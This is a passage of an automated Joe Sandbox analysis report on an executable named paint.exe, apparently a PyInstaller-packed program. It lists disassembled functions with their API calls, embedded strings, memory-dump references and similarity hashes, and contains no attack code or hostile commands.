Function 00007FF6F0BE9084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE90B6

Part of subcall function 00007FF6F0BEA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9CE
Part of subcall function 00007FF6F0BEA9B8: GetLastError.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9D8

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6F0BDCC15), ref: 00007FF6F0BE90D4

Strings

C:\Users\user\Desktop\paint.exe, xrefs: 00007FF6F0BE90C2

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\paint.exe
API String ID: 3580290477-805208900
Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction ID: 5fa3d13b04e764bf0fb41abbcfc1196389664612a6ee61fba1c50a048ba0f767
Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction Fuzzy Hash: 0F417F36A08B53A6EB14DF25D4400BD63A4EF467D0B954075ED6F83BC6EE3EE4958340

Function 00007FF6F0BECCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6F0BECDBF
GetLastError.KERNEL32 ref: 00007FF6F0BECDE1

Strings

U, xrefs: 00007FF6F0BECD6B

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction ID: 1248eb2e0edb7a13df03bfeee9d771d34271181080581012650bfa16a04786cc
Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction Fuzzy Hash: 6141B472B18A4595DB208F25E8443A96765FB99794FC08031EE5EC77D8EF3ED401C740

Function 00007FF6F0BEF628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF6F0BEF668
GetCurrentDirectoryW.KERNEL32 ref: 00007FF6F0BEF6BA

Strings

:, xrefs: 00007FF6F0BEF67E

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
Instruction ID: 1649b0adae0421e439bd1163fabc03e1f2b7601d75be50cd600468e237bf34c7
Opcode Fuzzy Hash: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
Instruction Fuzzy Hash: 58210463B0828296FB209B11D04426D73B2FB85B44FD58035DAAE837D4EF7EE945CB40

Function 00007FF6F0BDFDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF6F0BDFE08
RaiseException.KERNEL32 ref: 00007FF6F0BDFE49

Strings

csm, xrefs: 00007FF6F0BDFE36

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction ID: de9154bc5d2f83437673e0bf81cc70f8c64743efad34a3845752fa93014ab389
Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction Fuzzy Hash: AB116D32609B8192EB208F15F400269B7E5FB89B85F984230DF9E477A9EF3DC551CB00

Function 00007FF6F0BF07AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF07DC
GetDriveTypeW.KERNEL32 ref: 00007FF6F0BF081C

Strings

:, xrefs: 00007FF6F0BF0805

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction ID: 66c3e0b18368ed52c6b718f302a14bb7ebdb5486661301eb11f00261e34a9cc3
Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction Fuzzy Hash: 1501846692C20395F720AFA0986627E63A4EF56749FC00035D56EC37D1FF3DE9048B15

Analysis Process: paint.exePID: 2132, Parent PID: 6716COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.8%
Total number of Nodes:	1202
Total number of Limit Nodes:	98

Executed Functions

Function 00007FF6F0BD1000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Py_GIL_DISABLED, xrefs: 00007FF6F0BD3AF4
VCRUNTIME140.dll, xrefs: 00007FF6F0BD3DB1
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF6F0BD3C61
Could not create temporary directory!, xrefs: 00007FF6F0BD3CBF
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF6F0BD3E0A
Failed to convert DLL search path!, xrefs: 00007FF6F0BD3DDC
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF6F0BD3D35
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF6F0BD3EBB
pkg, xrefs: 00007FF6F0BD39BE
pyi-runtime-tmpdir, xrefs: 00007FF6F0BD3B68
Failed to remove temporary directory: %s, xrefs: 00007FF6F0BD3FC3
pyi-disable-windowed-traceback, xrefs: 00007FF6F0BD3BB2
Failed to load splash screen resources!, xrefs: 00007FF6F0BD3E85
Failed to start splash screen!, xrefs: 00007FF6F0BD3ED4
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF6F0BD3EA6
_PYI_SPLASH_IPC, xrefs: 00007FF6F0BD3A23, 00007FF6F0BD3EF5
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF6F0BD3D12
MEI, xrefs: 00007FF6F0BD3933
pyi-python-flag, xrefs: 00007FF6F0BD3AD6
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF6F0BD3B32
_PYI_ARCHIVE_FILE, xrefs: 00007FF6F0BD38D2, 00007FF6F0BD39FF
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF6F0BD3882, 00007FF6F0BD38AF
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF6F0BD3A17, 00007FF6F0BD3A2F, 00007FF6F0BD3A9B
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF6F0BD3A0B, 00007FF6F0BD3CD4, 00007FF6F0BD3F6B
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF6F0BD3BE8
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6F0BD39DE
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF6F0BD3971
pyi-contents-directory, xrefs: 00007FF6F0BD3B8D

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
API String ID: 2776309574-4232158417
Opcode ID: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
Instruction ID: b7b4922780083decd8472ad9f1faaa48d88e0f93a3ca88e2fd82dc7981fd91c0
Opcode Fuzzy Hash: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
Instruction Fuzzy Hash: AA326E25A0E682B1EB259B2496543B9E752AF56B80FC44032DA6FC33D7FF2EE555C300

Function 00007FFDFB0792C0 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 513
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB07938F
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB07946E
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB079490
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB07964E
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB079677

Strings

nolock, xrefs: 00007FFDFB0797D5
immutable, xrefs: 00007FFDFB07980D
-journal, xrefs: 00007FFDFB079656

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: -journal$immutable$nolock
API String ID: 4225454184-4201244970
Opcode ID: d2ddce0ad0a317c0152327d0b3e11dab5987b1b9eb9b0a833ce77e87ac107de1
Instruction ID: c8feec76c816ecda390c606168c817b423e7fdc3f47d0da950cda028859c3fa8
Opcode Fuzzy Hash: d2ddce0ad0a317c0152327d0b3e11dab5987b1b9eb9b0a833ce77e87ac107de1
Instruction Fuzzy Hash: A832AF62B0A68396EB548F25E464BB87790FB46BA8F144234CA7E077E8DF3CE455D300

Function 00007FFDFB0DCFB0 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 441COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0DD627

Strings

API call with %s database connection pointer, xrefs: 00007FFDFB0DD004
invalid, xrefs: 00007FFDFB0DCFF2
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB0DD015
NULL, xrefs: 00007FFDFB0DCFDD
unopened, xrefs: 00007FFDFB0DCFFD
%s at line %d of [%.10s], xrefs: 00007FFDFB0DD02E
misuse, xrefs: 00007FFDFB0DD022

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
API String ID: 4225454184-509082904
Opcode ID: e3ced5d6ea85a757b1e139773ef655a56cd29a8a81a97bbefb3f42df5bc13da9
Instruction ID: 138d9d4d2a1946d16cafb6fd6a179dc277fcd7b6117bf4df6ee99b05d72a9f3e
Opcode Fuzzy Hash: e3ced5d6ea85a757b1e139773ef655a56cd29a8a81a97bbefb3f42df5bc13da9
Instruction Fuzzy Hash: BB127322B0A64785EB549F15A460BB967A1FF8AB88F144235EE6D077FCDF3CE445A300

Function 00007FF6F0BF5C70 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6F0BF5CB5

Part of subcall function 00007FF6F0BF5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF561C

Part of subcall function 00007FF6F0BEA9B8: HeapFree.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9CE
Part of subcall function 00007FF6F0BEA9B8: GetLastError.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9D8

Part of subcall function 00007FF6F0BEA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6F0BEA94F,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEA979
Part of subcall function 00007FF6F0BEA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6F0BEA94F,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEA99E

_get_daylight.LIBCMT ref: 00007FF6F0BF5CA4

Part of subcall function 00007FF6F0BF5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF567C

_get_daylight.LIBCMT ref: 00007FF6F0BF5F1A
_get_daylight.LIBCMT ref: 00007FF6F0BF5F2B
_get_daylight.LIBCMT ref: 00007FF6F0BF5F3C
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F0BF617C), ref: 00007FF6F0BF5F63

Strings

Eastern Standard Time, xrefs: 00007FF6F0BF6009
Eastern Summer Time, xrefs: 00007FF6F0BF6021

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 4070488512-239921721
Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
Instruction ID: 69cd1c9e8cec580f86320ee8c94abef9dfe5dd09a0da2057a5d6ddb0f22e9c31
Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
Instruction Fuzzy Hash: 65D1D03AA0820266EB20AF61D8411B96769EF56795FC08035EE2EC77D6FF3EE4418340

Function 00007FF6F0BF69D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6F0BF6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF6749
Part of subcall function 00007FF6F0BF6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF67C7
Part of subcall function 00007FF6F0BF6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF6818

CreateFileW.KERNEL32 ref: 00007FF6F0BF6ADA
CreateFileW.KERNEL32 ref: 00007FF6F0BF6B2A
GetLastError.KERNEL32 ref: 00007FF6F0BF6B5A
GetFileType.KERNEL32 ref: 00007FF6F0BF6B6F
GetLastError.KERNEL32 ref: 00007FF6F0BF6B79
CloseHandle.KERNEL32 ref: 00007FF6F0BF6BAC
CloseHandle.KERNEL32 ref: 00007FF6F0BF6D0F
CreateFileW.KERNEL32 ref: 00007FF6F0BF6D44
GetLastError.KERNEL32 ref: 00007FF6F0BF6D53

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: 38828b328dd74633a06efc509083ae11ea937120d790e1ddf9eecf71d5b71c3f
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: CFC1E13AB28A4295EB10CFA4C4916AC3769FB4AB98B415235DE2FD77D5EF3AD411C300

Function 00007FF6F0BF5EEC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6F0BF5F1A

Part of subcall function 00007FF6F0BF5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF567C

_get_daylight.LIBCMT ref: 00007FF6F0BF5F2B

Part of subcall function 00007FF6F0BF5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF561C

_get_daylight.LIBCMT ref: 00007FF6F0BF5F3C

Part of subcall function 00007FF6F0BF5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF564C

Part of subcall function 00007FF6F0BEA9B8: HeapFree.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9CE
Part of subcall function 00007FF6F0BEA9B8: GetLastError.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9D8

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F0BF617C), ref: 00007FF6F0BF5F63

Strings

Eastern Standard Time, xrefs: 00007FF6F0BF6009
Eastern Summer Time, xrefs: 00007FF6F0BF6021

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
Instruction ID: 61beec96e97131efd3c013a54083263a9fac423be72d3eb15e6dbd9ada95775e
Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
Instruction Fuzzy Hash: B951C03AA08642A6E720EF71D9811A96768BF59784FC09135EA6EC77D2FF3DE4008740

Function 00007FFDFB029060 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 850librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFDFB029B20
GetProcAddress.KERNEL32 ref: 00007FFDFB029B4A
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FFDFB029BD4
VirtualProtect.KERNEL32 ref: 00007FFDFB029BF2

Strings

)tP, xrefs: 00007FFDFB02908B

Memory Dump Source

Source File: 00000001.00000002.2014939078.00007FFDFB029000.00000080.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAB20000, based on PE: true

Associated: 00000001.00000002.2013832567.00007FFDFAB20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2013861786.00007FFDFAB21000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2013861786.00007FFDFAB32000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2013861786.00007FFDFAB42000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2013861786.00007FFDFAB48000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2013861786.00007FFDFAB92000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2013861786.00007FFDFABA7000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2013861786.00007FFDFABB7000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2013861786.00007FFDFABBE000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2013861786.00007FFDFABCC000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2013861786.00007FFDFADAE000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2013861786.00007FFDFAE99000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2013861786.00007FFDFAE9B000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2013861786.00007FFDFAED2000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2013861786.00007FFDFAF0F000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2013861786.00007FFDFAF6A000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2013861786.00007FFDFAFDB000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2013861786.00007FFDFB010000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2013861786.00007FFDFB023000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2014972970.00007FFDFB02A000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

